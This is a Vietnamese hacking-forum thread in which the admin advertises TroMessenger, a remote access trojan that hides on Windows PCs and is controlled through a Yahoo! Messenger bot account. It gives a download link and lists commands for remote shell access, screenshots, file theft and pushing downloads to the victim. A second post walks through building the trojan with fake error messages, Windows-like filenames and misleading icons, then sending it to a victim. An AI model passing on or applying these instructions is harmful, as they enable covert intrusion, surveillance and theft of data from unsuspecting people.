HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger

Go down

TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger Empty TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger

Post  Admin Thu Nov 11, 2010 5:23 am

Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Cơ chế hoạt động:

Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:
1) Chạy vào chương trình khởi động (Startup).
2) Kiểm soát bộ nhớ hệ thống.
3) Nằm ẩn chờ khi có kết nối vào mạng.
4) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.
5) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.
6) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.

Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.
2) 128MB RAM (256MB RAM cấu hình chuẩn)
3) 700Mhz CPU.
4) 8MB Card đồ họa.
5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)
6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN...
Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.

Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address?

Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề đã được giải quyết với TroMessenger.

Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.
Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS

Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính

Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername - cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername - cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.

Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.

Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?
Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.

Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"

Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.

Câu lệnh ví dụ :

/status Toiyeuem.

/idle Dangantoi.

/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu...

/restart - Khởi động lại máy tính.

Link download: Download
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger Empty HƯỚNG DẪN SỬ DỤNG TROMESSENGER

Post  Admin Wed Dec 15, 2010 8:15 am

TroMessenger- Xâm nhập máy tính từ xa thông qua Yahoo! Messenger Tromes10
_Khung Robot Yahoo! ID : bạn đánh một nick thật có sẵn (có thể tạo một cái )

_khung Robot Password : là pass của nick ở trên ( con TroMessenger sẻ dùng nick này để login vào và cho ta điều khiển thông qua cửa sổ chat với nick này , do đó bạn phải add cái nick này vô nick yahoo mà bạn đang dùng để khi nó login thì nick sẻ sáng lên và bạn điều khiển .)

_ Phía bên phải là mấy cái ô send IP , OS v...v.. bạn check vào hết cũng được, ko cũng ko sao , nếu check vào hết thì khi vưa nhiễm vào máy victim nó sẻ gữi IP ,OS về ngay cho bạn , còn ko check thì mình dùng lệnh ( sẻ chỉ sau ) để lấy các thông tin trên cũng được .
_ Khung Admin ID : nick bạn đang dùng , thật ra cái này cũng ko cần nếu bạn đã add cái nick robot vào rồi .

_ Phía dưới là phần Password Protect , ở khung password bạn đánh một cái pass và ghi nhớ pass này , khi cái nick robot sáng lên có nghĩa victim đang online và con TroMessenger đang hoạt động , bạn mở cửa sổ chat và bấm /login để đăng nhập quyền admin và bắt đầu điều khiển , phải đặt pass vì nếu không thì ai có add nick robot đều có thể điều khiển máy victim hết.

_ Phía dưới là phần Enable Fake erro message ( thông báo lổi giả) cái này tùy bạn muốn lổi gì cũng được ,khi victim click mở con trojan (sắp tạo ra ) sẻ nhận được thông báo lổi này , bấm test để thử .
_Phía dưới là phần timeout settings ,ô Delay for sending long texts bạn định thời gian để gửi các tin nhắn liên tiếp về cho ta , vì trong yahoo chat nếu lượng thông tin quá dài thì nó sẻ được ngắt ra thành nhiều đoạn và gữi về lần lượt , thời gian để gửi 2 bản tin liên tiếp đó bao lâu thì bạn đánh vô ô này ( tính bằng ms ) . Ô AutoConnect Attempt every là bạn định thời gian cho con trojan tự động kết nối vào mạng, mặc định là 1 phút , nghĩa là cứ mổi phút nó lại connect 1 lần (giải thích thêm : nếu victim disconnect thì con trojan sẻ "mất liên lạc" khi victim conncet lại thì do mổi phút con trojan lại tự động login vô nên sau khi victim kết nối vô mạng lại , thì cái nick robot chậm nhất là 1 phút nó sẻ đươc login và sáng lên ta lại tiếp tục điều khiển )

_ Filename After install : đạt tên cho file sau khi nó bị nhiểm vô máy victim , cái yếu của con TroMessenger là trong task manager vẫn thấy nó chạy do đó bạn lựa cái tên nào cho nó khó phát hiện , nên chọn những tên gần giống với windows

_ Server Icon : là Icon của con trojan sắp được tạo ra , tùy bạn chọn làm sao cho victim khó nghi ngờ , có thể lấy icon đã có sẵn.

_ Cuối cùng nhấn build server rồi tìm cái file TroMessenger.exe hồi nãy đã mới giải nén , nhấn open , sau khi đã báo thành công thì sẻ có 1 con trojan được tạo ra , mặc định là output.exe , bạn gữi nó cho victim , click vô là dính chấu
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum